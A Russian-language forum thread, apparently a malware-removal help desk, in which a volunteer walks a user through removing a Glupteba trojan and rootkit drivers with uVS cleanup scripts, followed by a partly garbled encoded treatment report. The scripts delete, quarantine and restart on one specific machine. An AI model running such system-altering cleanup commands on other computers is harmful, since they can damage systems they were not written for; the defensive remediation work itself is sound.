[COLOR=silver]- - - - -Добавлено - - - - -[/COLOR]
Утилиту SecurityCheck вы скачивали по ссылке, которую я дал или она у вас уже была?
И если по моей ссылке, интернет при её работе вероятно был отключен, верно?[/QUOTE]
Утилиту SecurityCheck ту которую вы дали, да я заметил интернет вроде выключился
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
[QUOTE=i--l--g--i--z;1507385]Утилиту SecurityCheck ту которую вы дали, да я заметил интернет вроде выключился[/QUOTE]
полный образ авто запуска в архиве
[url=http://virusinfo.info/showthread.php?t=121769]Выполните скрипт в uVS:[/url][code]
;uVS v4.1.7 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
icsuspend
BREG
;---------command-block---------
delref %SystemRoot%\WINDOWS\SYSTEM32\QMGR.DLL
apply
zoo %SystemRoot%\WINDEFENDER.EXE
bl 0D0BE9FD3B3B43BB47A22A702DD77820 2079744
addsgn 9252626A396AC1CCE0CB7D4E334BDFFACE9A6C66196A8FE80FC583345791709756104849BDBB6158F0F26927471649FA7C049D75DEC433C2D1667F3E0707F900 8 Trojan-Dropper.Win32.Agent [Kaspersky] 7
zoo %SystemRoot%\RSS\CSRSS.EXE
bl 9877C2149DC89817E3844C2101371FE2 4016640
addsgn 1A0D3B9A5583338CF42B95BC743C690550880F3560AA517885964E50D33A511A747DCB0E805DCD082B0DF97FB5B3C28F7154957AD02CC43FDB71B45BC98D2DF0 8 DangerousObject.Multi.Gen [Kaspersky] 7
zoo %SystemDrive%\USERS\BAZA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE
bl 3DB7F7081EF9FA181416A2532664B33D 683008
addsgn 71D13ED8176A4C7D8FAAAFB164695347678A7CCE608F12380EDB467C54D5B2EF2357895754553C913BC8846096B54DBA37DF632A69597328A46AAC6F8D062176 8 Tr-Proxy.Win32.Glupteba.gen [Kaspersky] 7
zoo %SystemDrive%\USERS\BAZA\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
bl 19D4DDE02B1DDFB0158C48F63DB58CC4 4015616
addsgn 1A9C379A5583338CF42B95BC742C690550880F3560FA597885964E50D33A511A747DCB0E80A5D2082B0DF97FB5B3C28F7154957AD02CC43FDB71B45BC98D2DF0 8 DangerObject.Multi.Generic [Kaspersky] 7
zoo %Sys32%\DRIVERS\WINMON.SYS
bl 4EF0C39E632279D7B3672D2EFC071E5B 7248
addsgn 79132211B982955C0BD4F3587B37EDFAAE75A97D65ACA138B583C5EBDB18CE0C1357C364FE6E523A1703BAB33324C2BC5D891747C9ECF02CA442E01F8706DD06 64 Rootkit.Win32.Agent.elob [Kaspersky] 7
zoo %Sys32%\DRIVERS\WINMONFS.SYS
bl 0D3A8D67CD969C6E096B4D29E910DD9E 18616
addsgn 79132211B9824A720BD4F3586037EDFAAE75A97D65AB4ED9819385BCE998970C989203233A6E5C3C3E8FB5AA424609FADEDBB83255AFB7A7ECD4A07F8706D5A3 64 HEUR:Trojan.Win32.Generic [Kaspersky] 7
zoo %Sys32%\DRIVERS\WINMONPROCESSMONITOR.SYS
bl 622FD523A87CB55BE0B676A70C64E8F8 28368
addsgn 79132211B982470D0BD4F3587B37EDFAAE75A97D65ACA1480583C5EBDB18CE7CA357C364FE6E523A1703BAB33324C2BC5D891747D95CF02CA44290AF8706DD06 64 Trojan.Win32.KillAV.rjy [Kaspersky] 7
chklst
delvir
deltmp
czoo
restart
[/code]
Компьютер перезагрузится.
Ещё раз соберите образ автозапуска uVS для контроля.
[QUOTE=Sandor;1507393][url=http://virusinfo.info/showthread.php?t=121769]Выполните скрипт в uVS:[/url][code]
;uVS v4.1.7 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
icsuspend
BREG
;---------command-block---------
delref %SystemRoot%\WINDOWS\SYSTEM32\QMGR.DLL
apply
zoo %SystemRoot%\WINDEFENDER.EXE
bl 0D0BE9FD3B3B43BB47A22A702DD77820 2079744
addsgn 9252626A396AC1CCE0CB7D4E334BDFFACE9A6C66196A8FE80FC583345791709756104849BDBB6158F0F26927471649FA7C049D75DEC433C2D1667F3E0707F900 8 Trojan-Dropper.Win32.Agent [Kaspersky] 7
zoo %SystemRoot%\RSS\CSRSS.EXE
bl 9877C2149DC89817E3844C2101371FE2 4016640
addsgn 1A0D3B9A5583338CF42B95BC743C690550880F3560AA517885964E50D33A511A747DCB0E805DCD082B0DF97FB5B3C28F7154957AD02CC43FDB71B45BC98D2DF0 8 DangerousObject.Multi.Gen [Kaspersky] 7
zoo %SystemDrive%\USERS\BAZA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE
bl 3DB7F7081EF9FA181416A2532664B33D 683008
addsgn 71D13ED8176A4C7D8FAAAFB164695347678A7CCE608F12380EDB467C54D5B2EF2357895754553C913BC8846096B54DBA37DF632A69597328A46AAC6F8D062176 8 Tr-Proxy.Win32.Glupteba.gen [Kaspersky] 7
zoo %SystemDrive%\USERS\BAZA\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
bl 19D4DDE02B1DDFB0158C48F63DB58CC4 4015616
addsgn 1A9C379A5583338CF42B95BC742C690550880F3560FA597885964E50D33A511A747DCB0E80A5D2082B0DF97FB5B3C28F7154957AD02CC43FDB71B45BC98D2DF0 8 DangerObject.Multi.Generic [Kaspersky] 7
zoo %Sys32%\DRIVERS\WINMON.SYS
bl 4EF0C39E632279D7B3672D2EFC071E5B 7248
addsgn 79132211B982955C0BD4F3587B37EDFAAE75A97D65ACA138B583C5EBDB18CE0C1357C364FE6E523A1703BAB33324C2BC5D891747C9ECF02CA442E01F8706DD06 64 Rootkit.Win32.Agent.elob [Kaspersky] 7
zoo %Sys32%\DRIVERS\WINMONFS.SYS
bl 0D3A8D67CD969C6E096B4D29E910DD9E 18616
addsgn 79132211B9824A720BD4F3586037EDFAAE75A97D65AB4ED9819385BCE998970C989203233A6E5C3C3E8FB5AA424609FADEDBB83255AFB7A7ECD4A07F8706D5A3 64 HEUR:Trojan.Win32.Generic [Kaspersky] 7
zoo %Sys32%\DRIVERS\WINMONPROCESSMONITOR.SYS
bl 622FD523A87CB55BE0B676A70C64E8F8 28368
addsgn 79132211B982470D0BD4F3587B37EDFAAE75A97D65ACA1480583C5EBDB18CE7CA357C364FE6E523A1703BAB33324C2BC5D891747D95CF02CA44290AF8706DD06 64 Trojan.Win32.KillAV.rjy [Kaspersky] 7
chklst
delvir
deltmp
czoo
restart
[/code]
Компьютер перезагрузится.
Ещё раз соберите образ автозапуска uVS для контроля.[/QUOTE]
не могу загрузить архив, не хватает места, что делать?
Мой кабинет - Вложения - Отметьте старые вложения и нажмите кнопку "Удалить".
Или загрузите на "облако" и ссылку на скачивание сюда.
[QUOTE=Sandor;1507425]Мой кабинет - Вложения - Отметьте старые вложения и нажмите кнопку "Удалить".
Или загрузите на "облако" и ссылку на скачивание сюда.[/QUOTE]
[url]https://cloud.mail.ru/public/2m9b/3dwNBnPQn[/url]
[url=http://virusinfo.info/showthread.php?t=121769]Выполните скрипт в uVS:[/url][code]
;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
;---------command-block---------
delref %SystemRoot%\RSS\CSRSS.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.8\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.17\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.302\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.342\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.115\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.23\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
apply
restart
[/code]
Компьютер перезагрузится.
[quote="i--l--g--i--z;1507374"]у меня корпоративная лицензия на Антивирус Eset, пытаюсь установить eset, Dr.Web Security Space в дальнейшем будет удален[/quote]
Только действовать нужно наоборот: сначала деинсталлировать Dr.Web через Панель управления - Удаление программ (затем пройдитесь [url=http://download.geo.drweb.com/pub/drweb/tools/drw_remover.exe]этой утилитой[/url]), а после этого ставить Eset.
[QUOTE=Sandor;1507448][url=http://virusinfo.info/showthread.php?t=121769]Выполните скрипт в uVS:[/url][code]
;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
;---------command-block---------
delref %SystemRoot%\RSS\CSRSS.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.8\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.17\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.302\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.342\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.115\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.23\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
apply
restart
[/code]
Компьютер перезагрузится.
Только действовать нужно наоборот: сначала деинсталлировать Dr.Web через Панель управления - Удаление программ (затем пройдитесь [url=http://download.geo.drweb.com/pub/drweb/tools/drw_remover.exe]этой утилитой[/url]), а после этого ставить Eset.[/QUOTE]
Спасибо, вы мне осень сильно помогли
В завершение:
1.
[LIST][*]Пожалуйста, запустите adwcleaner.exe[*]В меню [B]Настройки - Удалить AdwCleaner[/B] - выберите [B]Удалить[/B].[/LIST]
Переименуйте FRST.exe (или FRST64.exe) в [B]uninstall.exe[/B] и запустите.
Компьютер перезагрузится.
Остальные утилиты лечения и папки можно просто удалить.
2.
Скачайте ещё раз (другая ссылка):
[LIST][*]Загрузите [B][URL="https://www.comss.ru/page.php?id=1813"]SecurityCheck by glax24 & Severnyj[/URL][/B], сохраните утилиту на [I]Рабочем столе[/I] и извлеките из архива.[*]Запустите двойным щелчком мыши (если Вы используете [I]Windows XP[/I]) или из меню по щелчку правой кнопки мыши [I]Запустить от имени администратора[/I] (если Вы используете [I]Windows Vista/7/8/8.1/10[/I])[*]Если увидите [U]предупреждение от вашего фаервола или SmartScreen[/U] относительно программы SecurityCheck, не блокируйте ее работу[*]Дождитесь окончания сканирования, откроется лог в блокноте с именем [B]SecurityCheck.txt[/B][*]Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем [I]SecurityCheck[/I], например [I][COLOR=Blue]C:\SecurityCheck\SecurityCheck.txt[/COLOR][/I][*]Прикрепите этот файл к своему следующему сообщению.[/LIST]
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]1[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]26[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
[LIST=3D1][*] c:\users\baza\appdata\local\temp\csrss\cloudnet.exe - [B]HE=
UR:Trojan-Proxy.Win32.Glupteba.gen[/B] ( AVAST4: Win32:CrypterX-gen [T=
rj] )[*] c:\windows\rss\csrss.exe - [B]UDS:DangerousObject.Multi.Generic=
[/B] ( AVAST4: Win32:PWSX-gen [Trj] )[*] c:\windows\windefender.exe - [B]Trojan-Dropper.Win32.Agent.bjyww=
w[/B] ( AVAST4: Win32:Trojan-gen )[/LIST][/LIST]